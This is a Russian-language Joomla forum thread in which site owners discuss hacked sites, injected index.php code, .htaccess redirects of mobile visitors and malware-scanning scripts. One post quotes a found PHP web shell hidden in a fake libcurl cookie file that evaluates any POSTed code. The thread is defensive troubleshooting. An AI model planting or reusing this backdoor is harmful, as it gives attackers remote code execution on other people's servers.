Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 299 Ответов
  • 170455 Просмотров
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Это был бот и он еще вернется возможно.
*

rabamaster

  • Осваиваюсь на форуме
  • 43
  • 1 / 0
Спасибо, успокоил... Как найти где он сидит, у меня ли проблема? Может у других или у хостера. Последнее время хостер как-то нестабильно работает, такое впечатление, что его досят. Они приняли меры от брута (после смены пароля сам попадал в бан). Просмотр логов хостера ничего не дал.
Кроме того, что кто-то заходил 06.07.12 в мою админку (я тогда был на дне рождения и на клавишу бы не попал) и появился файл от 06.07.12 (index.phph, который заменил мой index.php).
Вроде все просто - утечка пароля, но неужели на одном IP хостера у 260 сайтов произошла утечка?

Юзал описанный здесь скрипт, но никакой файл и код, внутри предложенных скриптом файлах, у меня подозрения не вызвал, может потому, что я - баран. Не знаю, но боюсь нового взлома, чувствую себя портовой девицей, непонятно кого отмотросили, но болею я.
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
может у хостера увели. Такое бывало.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Мне кажется есть серьезная бага на движке... По этому хотел узнать как можно понять что за уязвимость?
Почитай про протокол TCP/IP ,и узнаешь как передаются пакеты с не зашифрованными данными.
*

Свят

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
  • Не прыгаю за бабочками, они сами липнут ко мне...
на заметку тем, у кого на сайтах обнаружился вирус:
  • fls.php не очень помог, определил только файл readme в корне сайта как подозрительный, в нотпаде он не открылся, поэтому я просто напросто его удалил.
  • после полтора часов поиска, заглянул в index.php, тот что именно в корне лежит, а не шаблонный индекс, и вот там - как раз первой строчкой и оказалась зашифрованная бяка
Проблему с сайтом обнаружил лишь на второй день после заражения, когда в статистике увидел посещение сайта в день 50 уников, вместо около 500-от. Как оказалось с поисковых систем кидало на другой сайт.
Сайт на который кидало -
Спойлер
[свернуть]

Мож кому-то и понадобится моя писанина=) как заразился пока неочень понятно...
« Последнее редактирование: 14.08.2012, 21:03:42 от Свят »
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу

Судя по многим признакам, теперь уже ломают чаще не турки, а русскоязычные, и похоже, что даже со специализацией именно по Joomla! При этом совсем не школоло. Т.е. те, кто с немалой вероятностью заглядывают и в этот самый форум. Поэтому выкладывать сюда все мелкие хитрости противодействия хаку может быть не всегда разумно.
Ну насколько я понял,то присутствуют форумчане,которые заливают бекдор нехорошим заказчикам? http://joomlaforum.ru/index.php/topic,93126.0.html
*

Айболит

  • Новичок
  • 4
  • 0 / 0
Здравствуйте

Проблема, взломали сайты.
Несколько сайтов, лежат на разных хостингах, все на Joomla.

Через некоторые промежутки времени, появляется новый файл htaccess, делающий редирект.
Редирект происходит для мобильных браузеров и устройств андроид.
Конечный сайт предлогает обновить браузер.

На нескольких сайтах в файле index.php было добавлено сверху несколько вредоносных строк, но проблема оказалась не в них (понял это, когда удалил их, но проблема осталась)

Один из сайтов вообще касперским стал запрещаться, в подозрительные ссылки попал сам сайт и его фавикон(((

С других происходила загрузка каких-то файлов, запрещаемых касперским

Воспользовался предоставленной утилитой, нашел почти 100 файлов.
Удалил все, что хранилось в tmp, файлы, к радости, скачиваться перестали)))
Удалил ненужные htaccess

Подскажите, в чем может быть проблема, ведь сайты на разных хостингах, а проблема на всех сайтах разом(((
ФТП клиент filezilla. Левые письма через задать вопрос по товару тоже приходили.

В чем же может быть проблема?

В гоолову пришло решение:

1.Старые бекапы, лежаще на компе обновить до последней joomlы
2.Удалить существующие сайты
3.Заново все залить с компа, поменять все пароли

Поможет?
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
В чем же может быть проблема?
Читайте логи.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
2Айболит
что за сайты вы хоть ссылки киньте и подробней какие движки и расширения стоят
Цитировать
Поможет?
чем?
ответить на ваши вопросы?
*

Айболит

  • Новичок
  • 4
  • 0 / 0
Сайт - tutotvet.com

joomla 1.5.21

VirtueMart 1.1.5 stable

CSVimproved

JCE

JoomlaWatch

Яндекс Карты

Результат скрипта после очистки tmp
Спойлер
[свернуть]


Файл htaccess, который постоянно появляется, ссылки правда внизу иногда различаются

Спойлер
[свернуть]

Касперский ругается на следующие файлы:

http://tutotvet.com/administrator/templates/system/css/system.css
Спойлер
[свернуть]

http://tutotvet.com/administrator/templates/khepri/css/rounded.css
Спойлер
[свернуть]

http://tutotvet.com/administrator/templates/khepri/css/login.css
Спойлер
[свернуть]

http://tutotvet.com/media/system/js/mootools.js
Спойлер
[свернуть]
« Последнее редактирование: 23.08.2012, 12:49:45 от Айболит »
*

Айболит

  • Новичок
  • 4
  • 0 / 0
flyingspook, Конечно, буду очень рад получить помощь пофессионала!
Сайты на двух хостах

Godaddy.com
reg.ru
Все болеют

Как мне с Вами связаться? в личку я почему-то писать сообщения не могу

Имеет ли смысл обновить Joomla с виртом сейчас, или сначала избавиться от уязвимостей?
*

Айболит

  • Новичок
  • 4
  • 0 / 0
Сайт начинает ужасно работать.

Показываются не все картинки в админке, также, в админке не работает верхнее меню, работает только в хроме.

joomlawatch не загружает статистику и посетителей, зато касперский находит кучу вредоносных ссылок, вирт стал без картинок
 ! !
*

alex-143390

  • Захожу иногда
  • 92
  • 0 / 0
Подскажите в чем именно смотреть?

Спойлер
[свернуть]
*

alex-143390

  • Захожу иногда
  • 92
  • 0 / 0
Нужна помощь!
Если захожу на сайт с телефона или планшета происходит перенаправление на порно сайт с вирусами!
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Нужна помощь!
Если захожу на сайт с телефона или планшета происходит перенаправление на порно сайт с вирусами!
Замени .htaccess на стандартный,или очисти старый
*

alex-143390

  • Захожу иногда
  • 92
  • 0 / 0
Замени .htaccess на стандартный,или очисти старый
Очистил-ничего! Так же остался в конце исходного кода ссылка на вирус.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Очистил-ничего! Так же остался в конце исходного кода ссылка на вирус.
base64_decode есть в index.php шаблона ?
*

andrey77777

  • Захожу иногда
  • 83
  • 1 / 1
Здравствуйте! на сайте постоянно появляются трояны - создал тему (кому интересно) http://joomlaforum.ru/index.php/topic,229119.msg1198933.html#msg1198933 , но пошел дальше и понял, что лучше спросить здесь, поскольку чувствую они опять будут появляться. Хотелось бы найти дыру

Использовал скрипт
Спойлер
[свернуть]

Но не могу его понять - как по мне все нормально. Потом использовал скрипт ai-bolit. http://www.timmisworld.ru/ai-bolit.php?p=77777

Он выдал закодированный код 64 .его я удалил - но к сожалению, знаний не хватает и не знаю как залатать дыры и что делать :( . Пожалуйста растолкуйте эти 2 скрипта
*

andrey77777

  • Захожу иногда
  • 83
  • 1 / 1
Неужели ни кто не может растолковать? :(  ребята ау....
*

Apple_Buy

  • Захожу иногда
  • 71
  • 1 / 0
  • Истина всегда рядом....
Неужели ни кто не может растолковать? :(  ребята ау....

Вы же сами писали что у вас Joomla 1.5.23, первое что следует сделать - это обновиться до последней версии, так как вполне могут использовать дыры движка для доступа к сайту.
*

dimon888951

  • Захожу иногда
  • 115
  • 24 / 3
просканировал сайт на денвере, вот результат,это плохо?
Спойлер
[свернуть]
*

andrey77777

  • Захожу иногда
  • 83
  • 1 / 1
Вы же сами писали что у вас Joomla 1.5.23, первое что следует сделать - это обновиться до последней версии, так как вполне могут использовать дыры движка для доступа к сайту.
Это  я понимаю ..... мне интересуют скрипты - потому что грамотно их растолковать не могу
*

nemius

  • Осваиваюсь на форуме
  • 39
  • 0 / 0

Notice: Undefined variable: E in /home/ID/site.ru/docs/fls.php(2) : eval()'d code on line 132

Fatal error: Call to undefined function hash_file() in /home/id/site.ru/docs/fls.php(2) : eval()'d code on line 40

Что можно понять из вше написаного ?
*

andrey77777

  • Захожу иногда
  • 83
  • 1 / 1
Notice: Undefined variable: E in /home/ID/site.ru/docs/fls.php(2) : eval()'d code on line 132

Fatal error: Call to undefined function hash_file() in /home/id/site.ru/docs/fls.php(2) : eval()'d code on line 40

Что можно понять из вше написаного ?

Если Вы у меня спрашиваете - то без понятия....показывает ошибку.... Кстати это к моему сайту или это Ваш?
*

nemius

  • Осваиваюсь на форуме
  • 39
  • 0 / 0
я у себя на сайте запустил /fls.php  и получил две строки которые привел выше. Я из этих строк ничерта не понял !
/site.ru/docs/fls.php(2) : eval()'d code on line 40
на моем сайте в указаной скриптом папке (site.ru/docs/fls.php  нет и никогда не было файла  fls.php так что в каком файле в 40 строке искать код не понятно
/site.ru/docs/fls.php(2) : eval()'d code on line 132
так же и тут  !
« Последнее редактирование: 08.10.2012, 02:02:25 от nemius »
*

nemius

  • Осваиваюсь на форуме
  • 39
  • 0 / 0
2nemius
так понимаю вы не на хосте сканируете?
Именно что на хосте, закинул скрипт в корень хоста и выполнил запрос...
На локале понятное дело стоит апач но он выключен

upd.... закинул скриптик на другой сайт, одна строка:
Fatal error: Call to undefined function hash_file() in /home/папкахостера/syte.ru/docs/fls.php(2) : eval()'d code on line 40

 :o
« Последнее редактирование: 08.10.2012, 22:42:35 от nemius »
*

udzin

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
нашел у себя php файл

Код
# Netscape HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

195.230.125.75 FALSE /about/ FALSE 0 <?eval(stripslashes(array_pop($_POST)))?> 1

сканнер его не видит
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Edit at your own risk. Хехе и не увидит. Файл явно не хороший. http://joomlaforum.ru/index.php/topic,195980.msg1105287.html#msg1105287

Спойлер
[свернуть]
*

udzin

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
o! wishlight!
даже и не ожидал что кто-то поможет найти уязвимость. просто скинул сообщение чтоб обновили сканнер.

проблема похоже действительно с компонентами nonumber

жму руку!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 347
Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 244119
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 1314
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 486
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1090
Последний ответ 03.11.2020, 17:36:03
от Cedars